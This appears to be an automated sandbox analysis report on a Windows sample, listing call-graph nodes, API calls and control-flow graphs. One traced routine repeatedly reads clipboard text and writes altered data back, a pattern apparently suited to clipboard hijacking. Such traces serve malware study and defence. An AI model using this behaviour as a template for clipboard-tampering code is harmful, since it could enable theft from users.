f07ea 105370->105371 105372 f07d0 105370->105372 105431 f073f 105371->105431 105372->105371 105438 df649 20 API calls _abort 105372->105438 105375 f07df 105439 e2b5c 26 API calls pre_c_initialization 105375->105439 105377 f0822 105378 f0851 105377->105378 105440 df649 20 API calls _abort 105377->105440 105386 f08a4 105378->105386 105442 dda7d 26 API calls 2 library calls 105378->105442 105381 f089f 105383 f091e 105381->105383 105381->105386 105382 f0846 105441 e2b5c 26 API calls pre_c_initialization 105382->105441 105443 e2b6c 11 API calls _abort 105383->105443 105386->105323 105386->105324 105387 f092a 105389 e55a0 CallCatchBlock 105388->105389 105446 e32d1 EnterCriticalSection 105389->105446 105391 e55a7 105392 e55cc 105391->105392 105396 e563a EnterCriticalSection 105391->105396 105398 e55ee 105391->105398 105395 e5373 __wsopen_s 21 API calls 105392->105395 105394 e5617 __wsopen_s 105394->105327 105397 e55d1 105395->105397 105396->105398 105399 e5647 LeaveCriticalSection 105396->105399 105397->105398 105450 e54ba EnterCriticalSection 105397->105450 105447 e569d 105398->105447 105399->105391 105401->105341 105402->105337 105403->105333 105404->105334 105405->105337 105406->105348 105407->105337 105408->105344 105409->105351 105410->105350 105411->105352 105412->105355 105414 e5737 __wsopen_s 26 API calls 105413->105414 105417 e8a3e 105414->105417 105415 e8a44 105452 e56a6 21 API calls 2 library calls 105415->105452 105417->105415 105418 e8a76 105417->105418 105419 e5737 __wsopen_s 26 API calls 105417->105419 105418->105415 105420 e5737 __wsopen_s 26 API calls 105418->105420 105422 e8a6d 105419->105422 105423 e8a82 CloseHandle 105420->105423 105421 e8a9c 105424 e8abe 105421->105424 105453 df613 20 API calls __dosmaperr 105421->105453 105425 e5737 __wsopen_s 26 API calls 105422->105425 105423->105415 105426 e8a8e GetLastError 105423->105426 105424->105333 105425->105418 105426->105415 105428->105361 105429->105365 105430->105362 105432 f0757 105431->105432 105433 f0772 105432->105433 105444 df649 20 API calls _abort 105432->105444 105433->105377 105435 f0796 105445 e2b5c 26 API calls pre_c_initialization 105435->105445 105437 f07a1 105437->105377 105438->105375 105439->105371 105440->105382 105441->105378 105442->105381 105443->105387 105444->105435 105445->105437 105446->105391 105451 e3319 LeaveCriticalSection 105447->105451 105449 e56a4 105449->105394 105450->105398 105451->105449 105452->105421 105453->105424 105454 52e1000 105455 52e1102 105454->105455 105456 52e1012 105454->105456 105457 52e103a OpenClipboard 105456->105457 105458 52e1030 Sleep 105456->105458 105459 52e104a GetClipboardData 105457->105459 105460 52e10f9 GetClipboardSequenceNumber 105457->105460 105458->105456 105461 52e105a GlobalLock 105459->105461 105462 52e10f3 CloseClipboard 105459->105462 105460->105456 105461->105462 105463 52e106b GlobalAlloc 105461->105463 105462->105460 105465 52e109d GlobalLock 105463->105465 105466 52e10e9 GlobalUnlock 105463->105466 105467 52e10b0 105465->105467 105466->105462 105468 52e10b9 GlobalUnlock 105467->105468 105469 52e10cb EmptyClipboard SetClipboardData 105468->105469 105470 52e10e0 GlobalFree 105468->105470 105469->105466 105469->105470 105470->105466 105471 bf5e5 105474 bcab0 105471->105474 105473 bf5f3 105475 bcacb 105474->105475 105476 10150c 105475->105476 105477 1014be 105475->105477 105484 bcaf0 105475->105484 105515 1362ff 207 API calls 2 library calls 105476->105515 105480 1014c8 105477->105480 105482 1014d5 105477->105482 105477->105484 105513 136790 207 API calls 105480->105513 105502 bcdc0 105482->105502 105514 136c2d 207 API calls 2 library calls 105482->105514 105483 cbc58 8 API calls 105483->105484 105484->105483 105488 ce807 39 API calls 105484->105488 105491 bcdee 105484->105491 105493 1016e8 105484->105493 105496 bbe2d 39 API calls 105484->105496 105497 bcf70 105484->105497 105501 bcf80 39 API calls 105484->105501 105484->105502 105503 c0340 207 API calls 105484->105503 105504 bbed9 8 API calls 105484->105504 105506 ce7c1 39 API calls 105484->105506 105507 caa99 207 API calls 105484->105507 105508 d05b2 5 API calls __Init_thread_wait 105484->105508 105509 d0413 29 API calls __onexit 105484->105509 105510 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105484->105510 105511 cf4df 81 API calls 105484->105511 105512 cf346 207 API calls 105484->105512 105516 bb4c8 8 API calls 105484->105516 105517 10ffaf 8 API calls 105484->105517 105488->105484 105489 10179f 105489->105489 105491->105473 105518 136669 81 API calls 105493->105518 105496->105484 105497->105473 105501->105484 105502->105497 105519 123fe1 81 API calls __wsopen_s 105502->105519 105503->105484 105504->105484 105506->105484 105507->105484 105508->105484 105509->105484 105510->105484 105511->105484 105512->105484 105513->105482 105514->105502 105515->105484 105516->105484 105517->105484 105518->105502 105519->105489 105520 b1044 105525 b2793 105520->105525 105522 b104a 105561 d0413 29 API calls __onexit 105522->105561 105524 b1054 105562 b2a38 105525->105562 105529 b280a 105530 bbf73 8 API calls 105529->105530 105531 b2814 105530->105531 105532 bbf73 8 API calls 105531->105532 105533 b281e 105532->105533 105534 bbf73 8 API calls 105533->105534 105535 b2828 105534->105535 105536 bbf73 8 API calls 105535->105536 105537 b2866 105536->105537 105538 bbf73 8 API calls 105537->105538 105539 b2932 105538->105539 105572 b2dbc 105539->105572 105543 b2964 105544 bbf73 8 API calls 105543->105544 105545 b296e 105544->105545 105546 c3160 9 API calls 105545->105546 105547 b2999 105546->105547 105599 b3166 105547->105599 105549 b29b5 105550 b29c5 GetStdHandle 105549->105550 105551 b2a1a 105550->105551 105552 f39e7 105550->105552 105555 b2a27 OleInitialize 105551->105555 105552->105551 105553 f39f0 105552->105553 105554 d014b 8 API calls 105553->105554 105556 f39f7 105554->105556 105555->105522 105606 120ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105556->105606 105558 f3a00 105607 1212eb CreateThread 105558->105607 105560 f3a0c CloseHandle 105560->105551 105561->105524 105608 b2a91 105562->105608 105565 b2a91 8 API calls 105566 b2a70 105565->105566 105567 bbf73 8 API calls 105566->105567 105568 b2a7c 105567->105568 105569 b8577 8 API calls 105568->105569 105570 b27c9 105569->105570 105571 b327e 6 API calls 105570->105571 105571->105529 105573 bbf73 8 API calls 105572->105573 105574 b2dcc 105573->105574 105575 bbf73 8 API calls 105574->105575 105576 b2dd4 105575->105576 105615 b81d6 105576->105615 105579 b81d6 8 API calls 105580 b2de4 105579->105580 105581 bbf73 8 API calls 105580->105581 105582 b2def 105581->105582 105583 d014b 8 API calls 105582->105583 105584 b293c 105583->105584 105585 b3205 105584->105585 105586 b3213 105585->105586 105587 bbf73 8 API calls 105586->105587 105588 b321e 105587->105588 105589 bbf73 8 API calls 105588->105589 105590 b3229 105589->105590 105591 bbf73 8 API calls 105590->105591 105592 b3234 105591->105592 105593 bbf73 8 API calls 105592->105593 105594 b323f 105593->105594 105595 b81d6 8 API calls 105594->105595 105596 b324a 105595->105596 105597 d014b 8 API calls 105596->105597 105598 b3251 RegisterWindowMessageW 105597->105598 105598->105543 105600 f3c8f 105599->105600 105601 b3176 105599->105601 105618 123c4e 8 API calls 105600->105618 105602 d014b 8 API calls 105601->105602 105605 b317e 105602->105605 105604 f3c9a 105605->105549 105606->105558 105607->105560 105619 1212d1 14 API calls 105607->105619 105609 bbf73 8 API calls 105608->105609 105610 b2a9c 105609->105610 105611 bbf73 8 API calls 105610->105611 105612 b2aa4 105611->105612 105613 bbf73 8 API calls 105612->105613 105614 b2a66 105613->105614 105614->105565 105616 bbf73 8 API calls 105615->105616 105617 b2ddc 105616->105617 105617->105579 105618->105604 105620 b105b 105625 b52a7 105620->105625 105622 b106a 105656 d0413 29 API calls __onexit 105622->105656 105624 b1074 105626 b52b7 __wsopen_s 105625->105626 105627 bbf73 8 API calls 105626->105627 105628 b536d 105627->105628 105629 b5594 10 API calls 105628->105629 105630 b5376 105629->105630 105657 b5238 105630->105657 105633 b6b7c 8 API calls 105634 b538f 105633->105634 105635 b6a7c 8 API calls 105634->105635 105636 b539e 105635->105636 105637 bbf73 8 API calls 105636->105637 105638 b53a7 105637->105638 105639 bbd57 8 API calls 105638->105639 105640 b53b0 RegOpenKeyExW 105639->105640 105641 f4be6 RegQueryValueExW 105640->105641 105646 b53d2 105640->105646 105642 f4c7c RegCloseKey 105641->105642 105643 f4c03 105641->105643 105642->105646 105655 f4c8e _wcslen 105642->105655 105644 d017b 8 API calls 105643->105644 105645 f4c1c 105644->105645 105648 b423c 8 API calls 105645->105648 105646->105622 105647 b655e 8 API calls 105647->105655 105649 f4c27 RegQueryValueExW 105648->105649 105650 f4c44 105649->105650 105652 f4c5e ISource 105649->105652 105651 b8577 8 API calls 105650->105651 105651->105652 105652->105642 105653 bb329 8 API calls 105653->105655 105654 b6a7c 8 API calls 105654->105655 105655->105646 105655->105647 105655->105653 105655->105654 105656->105624 105658 f22d0 __wsopen_s 105657->105658 105659 b5245 GetFullPathNameW 105658->105659 105660 b5267 105659->105660 105661 b8577 8 API calls 105660->105661 105662 b5285 105661->105662 105662->105633 105663 c235c 105664 c2365 __fread_nolock 105663->105664 105665 b8ec0 52 API calls 105664->105665 105666 1074e3 105664->105666 105669 c23b6 105664->105669 105670 d014b 8 API calls 105664->105670 105673 c1ff7 __fread_nolock 105664->105673 105674 d017b 8 API calls 105664->105674 105665->105664 105675 1113c8 8 API calls __fread_nolock 105666->105675 105668 1074ef 105672 bbed9 8 API calls 105668->105672 105668->105673 105671 b7d74 8 API calls 105669->105671 105670->105664 105671->105673 105672->105673 105674->105664 105675->105668 105676 b1098 105681 b5fc8 105676->105681 105680 b10a7 105682 bbf73 8 API calls 105681->105682 105683 b5fdf GetVersionExW 105682->105683 105684 b8577 8 API calls 105683->105684 105685 b602c 105684->105685 105686 badf4 8 API calls 105685->105686 105700 b6062 105685->105700 105687 b6056 105686->105687 105689 b55dc 8 API calls 105687->105689 105688 b611c GetCurrentProcess IsWow64Process 105690 b6138 105688->105690 105689->105700 105691 f5269 GetSystemInfo 105690->105691 105692 b6150 LoadLibraryA 105690->105692 105693 b619d GetSystemInfo 105692->105693 105694 b6161 GetProcAddress 105692->105694 105695 b6177 105693->105695 105694->105693 105697 b6171 GetNativeSystemInfo 105694->105697 105698 b617b FreeLibrary 105695->105698 105699 b109d 105695->105699 105696 f5224 105697->105695 105698->105699 105701 d0413 29 API calls __onexit 105699->105701 105700->105688 105700->105696 105701->105680 105702 c0ebf 105703 c0ed3 105702->105703 105709 c1425 105702->105709 105704 c0ee5 105703->105704 105707 d014b 8 API calls 105703->105707 105705 10562c 105704->105705 105708 c0f3e 105704->105708 105735 bb4c8 8 API calls 105704->105735 105736 121b14 8 API calls 105705->105736 105707->105704 105710 c2b20 207 API calls 105708->105710 105726 c049d ISource 105708->105726 105709->105704 105712 bbed9 8 API calls 105709->105712 105732 c0376 ISource 105710->105732 105712->105704 105713 10632b 105740 123fe1 81 API calls __wsopen_s 105713->105740 105714 c1695 105719 bbed9 8 API calls 105714->105719 105714->105726 105715 c1e50 40 API calls 105715->105732 105717 105cdb 105723 bbed9 8 API calls 105717->105723 105717->105726 105718 10625a 105739 123fe1 81 API calls __wsopen_s 105718->105739 105719->105726 105722 c1990 207 API calls 105722->105732 105723->105726 105724 bbed9 8 API calls 105724->105732 105725 bbf73 8 API calls 105725->105732 105727 d0413 29 API calls pre_c_initialization 105727->105732 105728 d05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105728->105732 105729 106115 105737 123fe1 81 API calls __wsopen_s 105729->105737 105731 d014b 8 API calls 105731->105732 105732->105713 105732->105714 105732->105715 105732->105717 105732->105718 105732->105722 105732->105724 105732->105725 105732->105726 105732->105727 105732->105728 105732->105729 105732->105731 105733 c0aae ISource 105732->105733 105734 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105732->105734 105738 123fe1 81 API calls __wsopen_s 105733->105738 105734->105732 105735->105704 105736->105726 105737->105733 105738->105726 105739->105726 105740->105726 105741 e947a 105742 e9487 105741->105742 105746 e949f 105741->105746 105791 df649 20 API calls _abort 105742->105791 105744 e948c 105792 e2b5c 26 API calls pre_c_initialization 105744->105792 105747 e94fa 105746->105747 105755 e9497 105746->105755 105793 f0144 21 API calls 2 library calls 105746->105793 105749 ddcc5 __fread_nolock 26 API calls 105747->105749 105750 e9512 105749->105750 105761 e8fb2 105750->105761 105752 e9519 105753 ddcc5 __fread_nolock 26 API calls 105752->105753 105752->105755 105754 e9545 105753->105754 105754->105755 105756 ddcc5 __fread_nolock 26 API calls 105754->105756 105757 e9553 105756->105757 105757->105755 105758 ddcc5 __fread_nolock 26 API calls 105757->105758 105759 e9563 105758->105759 105760 ddcc5 __fread_nolock 26 API calls 105759->105760 105760->105755 105762 e8fbe CallCatchBlock 105761->105762 105763 e8fde 105762->105763 105764 e8fc6 105762->105764 105766 e90a4 105763->105766 105769 e9017 105763->105769 105795 df636 20 API calls _abort 105764->105795 105802 df636 20 API calls _abort 105766->105802 105768 e8fcb 105796 df649 20 API calls _abort 105768->105796 105772 e903b 105769->105772 105773 e9026 105769->105773 105770 e90a9 105803 df649 20 API calls _abort 105770->105803 105794 e54ba EnterCriticalSection 105772->105794 105797 df636 20 API calls _abort 105773->105797 105777 e9033 105804 e2b5c 26 API calls pre_c_initialization 105777->105804 105778 e902b 105798 df649 20 API calls _abort 105778->105798 105779 e9041 105781 e905d 105779->105781 105782 e9072 105779->105782 105799 df649 20 API calls _abort 105781->105799 105786 e90c5 __fread_nolock 38 API calls 105782->105786 105784 e8fd3 __wsopen_s 105784->105752 105787 e906d 105786->105787 105801 e909c LeaveCriticalSection __wsopen_s 105787->105801 105788 e9062 105800 df636 20 API calls _abort 105788->105800 105791->105744 105792->105755 105793->105747 105794->105779 105795->105768 105796->105784 105797->105778 105798->105777 105799->105788 105800->105787 105801->105784 105802->105770 105803->105777 105804->105784 105805 bdd3d 105806 1019c2 105805->105806 105807 bdd63 105805->105807 105810 101a82 105806->105810 105812 101a26 105806->105812 105818 101a46 105806->105818 105808 bdead 105807->105808 105811 d014b 8 API calls 105807->105811 105813 d017b 8 API calls 105808->105813 105857 123fe1 81 API calls __wsopen_s 105810->105857 105817 bdd8d 105811->105817 105855 ce6e8 207 API calls 105812->105855 105824 bdee4 __fread_nolock 105813->105824 105814 101a7d 105819 d014b 8 API calls 105817->105819 105817->105824 105818->105814 105856 123fe1 81 API calls __wsopen_s 105818->105856 105820 bdddb 105819->105820 105820->105812 105822 bde16 105820->105822 105821 d017b 8 API calls 105821->105824 105823 c0340 207 API calls 105822->105823 105825 bde29 105823->105825 105824->105818 105824->105821 105825->105814 105825->105824 105826 101aa5 105825->105826 105828 bde77 105825->105828 105829 bd526 105825->105829 105858 123fe1 81 API calls __wsopen_s 105826->105858 105828->105808 105828->105829 105830 d014b 8 API calls 105829->105830 105831 bd589 105830->105831 105847 bc32d 105831->105847 105834 d014b 8 API calls 105839 bd66e ISource 105834->105839 105835 bc3ab 8 API calls 105845 bd9ac ISource 105835->105845 105838 101f79 105860 1156ae 8 API calls ISource 105838->105860 105839->105838 105841 101f94 105839->105841 105842 bbed9 8 API calls 105839->105842 105843 bc3ab 8 API calls 105839->105843 105844 bd911 ISource 105839->105844 105859 bb4c8 8 API calls 105839->105859 105842->105839 105843->105839 105844->105835 105844->105845 105846 bd9c3 105845->105846 105854 ce30a 8 API calls ISource 105845->105854 105850 bc33d 105847->105850 105848 bc345 105848->105834 105849 d014b 8 API calls 105849->105850 105850->105848 105850->105849 105851 bbf73 8 API calls 105850->105851 105852 bc32d 8 API calls 105850->105852 105853 bbed9 8 API calls 105850->105853 105851->105850 105852->105850 105853->105850 105854->105845 105855->105818 105856->105814 105857->105814 105858->105814 105859->105839 105860->105841 105861 bf4dc 105862 bcab0 207 API calls 105861->105862 105863 bf4ea 105862->105863 105864 b1033 105869 b68b4 105864->105869 105868 b1042 105870 bbf73 8 API calls 105869->105870 105871 b6922 105870->105871 105877 b589f 105871->105877 105874 b69bf 105875 b1038 105874->105875 105880 b6b14 8 API calls __fread_nolock 105874->105880 105876 d0413 29 API calls __onexit 105875->105876 105876->105868 105881 b58cb 105877->105881 105880->105874 105882 b58be 105881->105882 105883 b58d8 105881->105883 105882->105874 105883->105882 105884 b58df RegOpenKeyExW 105883->105884 105884->105882 105885 b58f9 RegQueryValueExW 105884->105885 105886 b591a 105885->105886 105887 b592f RegCloseKey 105885->105887 105886->105887 105887->105882 105888 b36f5 105891 b370f 105888->105891 105892 b3726 105891->105892 105893 b372b 105892->105893 105894 b378a 105892->105894 105931 b3788 105892->105931 105898 b3738 105893->105898 105899 b3804 PostQuitMessage 105893->105899 105896 f3df4 105894->105896 105897 b3790 105894->105897 105895 b376f DefWindowProcW 105921 b3709 105895->105921 105946 b2f92 10 API calls 105896->105946 105900 b37bc SetTimer RegisterWindowMessageW 105897->105900 105901 b3797 105897->105901 105902 b3743 105898->105902 105903 f3e61 105898->105903 105899->105921 105907 b37e5 CreatePopupMenu 105900->105907 105900->105921 105905 f3d95 105901->105905 105906 b37a0 KillTimer 105901->105906 105908 b380e 105902->105908 105909 b374d 105902->105909 105949 11c8f7 65 API calls ___scrt_fastfail 105903->105949 105913 f3d9a 105905->105913 105914 f3dd0 MoveWindow 105905->105914 105915 b3907 Shell_NotifyIconW 105906->105915 105907->105921 105936 cfcad 105908->105936 105916 b3758 105909->105916 105917 f3e46 105909->105917 105911 f3e15 105947 cf23c 40 API calls 105911->105947 105922 f3dbf SetFocus 105913->105922 105923 f3da0 105913->105923 105914->105921 105924 b37b3 105915->105924 105920 b3763 105916->105920 105925 b37f2 105916->105925 105917->105895 105948 111423 8 API calls 105917->105948 105918 f3e73 105918->105895 105918->105921 105920->105895 105933 b3907 Shell_NotifyIconW 105920->105933 105922->105921 105923->105920 105926 f3da9 105923->105926 105943 b59ff DeleteObject DestroyWindow 105924->105943 105944 b381f 75 API calls ___scrt_fastfail 105925->105944 105945 b2f92 10 API calls 105926->105945 105931->105895 105932 b3802 105932->105921 105934 f3e3a 105933->105934 105935 b396b 60 API calls 105934->105935 105935->105931 105937 cfd4b 105936->105937 105938 cfcc5 ___scrt_fastfail 105936->105938 105937->105921 105939 b61a9 55 API calls 105938->105939 105941 cfcec 105939->105941 105940 cfd34 KillTimer SetTimer 105940->105937 105941->105940 105942 10fe2b Shell_NotifyIconW 105941->105942 105942->105940 105943->105921 105944->105932 105945->105921 105946->105911 105947->105920 105948->105931 105949->105918 105950 10400f 105966 beeb0 ISource 105950->105966 105951 bf211 PeekMessageW 105951->105966 105952 bef07 GetInputState 105952->105951 105952->105966 105953 bf0d5 105954 1032cd TranslateAcceleratorW 105954->105966 105956 bf28f PeekMessageW 105956->105966 105957 bf104 timeGetTime 105957->105966 105958 bf273 TranslateMessage DispatchMessageW 105958->105956 105959 bf2af Sleep 105976 bf2c0 105959->105976 105960 104183 Sleep 105960->105976 105961 1033e9 timeGetTime 106017 caa65 9 API calls 105961->106017 105962 cf215 timeGetTime 105962->105976 105963 11dd87 46 API calls 105963->105976 105965 10421a GetExitCodeProcess 105969 104230 WaitForSingleObject 105965->105969 105970 104246 CloseHandle 105965->105970 105966->105951 105966->105952 105966->105953 105966->105954 105966->105956 105966->105957 105966->105958 105966->105959 105966->105960 105966->105961 105979 c0340 207 API calls 105966->105979 105980 c2b20 207 API calls 105966->105980 105982 bf450 105966->105982 105989 bf6d0 105966->105989 106012 ce915 105966->106012 106018 12446f 8 API calls 105966->106018 106019 123fe1 81 API calls __wsopen_s 105966->106019 105967 103d51 105972 103d59 105967->105972 105968 14345b GetForegroundWindow 105968->105976 105969->105966 105969->105970 105970->105976 105973 1042b8 Sleep 105973->105966 105976->105962 105976->105963 105976->105965 105976->105966 105976->105967 105976->105968 105976->105973 106020 1360b5 8 API calls 105976->106020 106021 11f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105976->106021 105979->105966 105980->105966 105983 bf46f 105982->105983 105984 bf483 105982->105984 106022 be960 105983->106022 106054 123fe1 81 API calls __wsopen_s 105984->106054 105986 bf47a 105986->105966 105988 104584 105988->105988 105990 bf6ef 105989->105990 106006 bf7dc ISource 105990->106006 106071 d05b2 5 API calls __Init_thread_wait 105990->106071 105993 1045d9 105995 bbf73 8 API calls 105993->105995 105993->106006 105994 bbf73 8 API calls 105994->106006 105998 1045f3 105995->105998 105996 bbe2d 39 API calls 105996->106006 106072 d0413 29 API calls __onexit 105998->106072 106000 1045fd 106073 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106000->106073 106003 c0340 207 API calls 106003->106006 106004 123fe1 81 API calls 106004->106006 106006->105994 106006->105996 106006->106003 106006->106004 106007 bbed9 8 API calls 106006->106007 106008 c1ca0 8 API calls 106006->106008 106009 bfae1 106006->106009 106070 cb35c 207 API calls 106006->106070 106074 d05b2 5 API calls __Init_thread_wait 106006->106074 106075 d0413 29 API calls __onexit 106006->106075 106076 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106006->106076 106077 135231 101 API calls 106006->106077 106078 13731e 207 API calls 106006->106078 106007->106006 106008->106006 106009->105966 106013 ce959 106012->106013 106015 ce928 106012->106015 106013->105966 106014 ce94c IsDialogMessageW 106014->106013 106014->106015 106015->106013 106015->106014 106016 10eff6 GetClassLongW 106015->106016 106016->106014 106016->106015 106017->105966 106018->105966 106019->105966 106020->105976 106021->105976 106023 c0340 207 API calls 106022->106023 106043 be99d 106023->106043 106024 1031d3 106068 123fe1 81 API calls __wsopen_s 106024->106068 106026 bea0b ISource 106026->105986 106027 beac3 106028 beace 106027->106028 106029 bedd5 106027->106029 106031 d014b 8 API calls 106028->106031 106029->106026 106038 d017b 8 API calls 106029->106038 106030 becff 106032 1031c4 106030->106032 106033 bed14 106030->106033 106041 bead5 __fread_nolock 106031->106041 106067 136162 8 API calls 106032->106067 106036 d014b 8 API calls 106033->106036 106034 bebb8 106039 d017b 8 API calls 106034->106039 106047 beb6a 106036->106047 106037 d014b 8 API calls 106037->106043 106038->106041 106049 beb29 ISource __fread_nolock 106039->106049 106040 d014b 8 API calls 106042 beaf6 106040->106042 106041->106040 106041->106042 106042->106049 106055 bd260 106042->106055 106043->106024 106043->106026 106043->106027 106043->106029 106043->106034 106043->106037 106043->106049 106045 1031b3 106066 123fe1 81 API calls __wsopen_s 106045->106066 106047->105986 106049->106030 106049->106045 106049->106047 106050 10318e 106049->106050 106052 10316c 106049->106052 106063 b44fe 207 API calls 106049->106063 106065 123fe1 81 API calls __wsopen_s 106050->106065 106064 123fe1 81 API calls __wsopen_s 106052->106064 106054->105988 106056 bd29a 106055->106056 106057 bd2c6 106055->106057 106058 bf6d0 207 API calls 106056->106058 106059 c0340 207 API calls 106057->106059 106061 bd2a0 106058->106061 106060 10184b 106059->106060 106060->106061 106069 123fe1 81 API calls __wsopen_s 106060->106069 106061->106049 106063->106049 106064->106047 106065->106047 106066->106047 106067->106024 106068->106026 106069->106061 106070->106006 106071->105993 106072->106000 106073->106006 106074->106006 106075->106006 106076->106006 106077->106006 106078->106006

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 237 b5fc8-b6037 call bbf73 GetVersionExW call b8577 242 f507d-f5090 237->242 243 b603d 237->243 244 f5091-f5095 242->244 245 b603f-b6041 243->245 246 f5098-f50a4 244->246 247 f5097 244->247 248 f50bc 245->248 249 b6047-b60a6 call badf4 call b55dc 245->249 246->244 251 f50a6-f50a8 246->251 247->246 254 f50c3-f50cf 248->254 261 b60ac-b60ae 249->261 262 f5224-f522b 249->262 251->245 253 f50ae-f50b5 251->253 253->242 257 f50b7 253->257 255 b611c-b6136 GetCurrentProcess IsWow64Process 254->255 259 b6138 255->259 260 b6195-b619b 255->260 257->248 263 b613e-b614a 259->263 260->263 264 f5125-f5138 261->264 265 b60b4-b60b7 261->265 266 f522d 262->266 267 f524b-f524e 262->267 268 f5269-f526d GetSystemInfo 263->268 269 b6150-b615f LoadLibraryA 263->269 271 f513a-f5143 264->271 272 f5161-f5163 264->272 265->255 273 b60b9-b60f5 265->273 270 f5233 266->270 274 f5239-f5241 267->274 275 f5250-f525f 267->275 276 b619d-b61a7 GetSystemInfo 269->276 277 b6161-b616f GetProcAddress 269->277 270->274 279 f5145-f514b 271->279 280 f5150-f515c 271->280 282 f5198-f519b 272->282 283 f5165-f517a 272->283 273->255 281 b60f7-b60fa 273->281 274->267 275->270 284 f5261-f5267 275->284 278 b6177-b6179 276->278 277->276 285 b6171-b6175 GetNativeSystemInfo 277->285 286 b617b-b617c FreeLibrary 278->286 287 b6182-b6194 278->287 279->255 280->255 288 f50d4-f50e4 281->288 289 b6100-b610a 281->289 292 f519d-f51b8 282->292 293 f51d6-f51d9 282->293 290 f517c-f5182 283->290 291 f5187-f5193 283->291 284->274 285->278 286->287 294 f50f7-f5101 288->294 295 f50e6-f50f2 288->295 289->254 297 b6110-b6116 289->297 290->255 291->255 298 f51ba-f51c0 292->298 299 f51c5-f51d1 292->299 293->255 296 f51df-f5206 293->296 300 f5114-f5120 294->300 301 f5103-f510f 294->301 295->255 302 f5208-f520e 296->302 303 f5213-f521f 296->303 297->255 298->255 299->255 300->255 301->255 302->255 303->255
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 000B5FF7
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,0014DC2C,00000000,?,?), ref: 000B6123
                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 000B612A
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000B6155
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000B6167
                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 000B6175
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 000B617C
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 000B61A1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                          • Opcode ID: f4bfb05894389e94c0d4a760aecac215ad3d280d00fa3cd36348b8e9ab334a09
                                                                                                                                                                          • Instruction ID: 9784386c0b954ea4d8d5b1398cb0ce92c778ec1c1a83d7fedfb5c99df8f05c96
                                                                                                                                                                          • Opcode Fuzzy Hash: f4bfb05894389e94c0d4a760aecac215ad3d280d00fa3cd36348b8e9ab334a09
                                                                                                                                                                          • Instruction Fuzzy Hash: 9CA1723190A6C4DFC713CB6A7C611E93F947B2F301B084899DE81A7A62C63D47C4DB21

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 052E1032
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 052E103C
                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 052E104C
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 052E105D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 052E1090
                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 052E10A0
                                                                                                                                                                          • GlobalUnlock.KERNEL32 ref: 052E10C1
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 052E10CB
                                                                                                                                                                          • SetClipboardData.USER32(0000000D), ref: 052E10D6
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 052E10E3
                                                                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 052E10ED
                                                                                                                                                                          • CloseClipboard.USER32 ref: 052E10F3
                                                                                                                                                                          • GetClipboardSequenceNumber.USER32 ref: 052E10F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2509972243.00000000052E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2509951375.00000000052E0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2509992334.00000000052E2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_52e0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1416286485-0
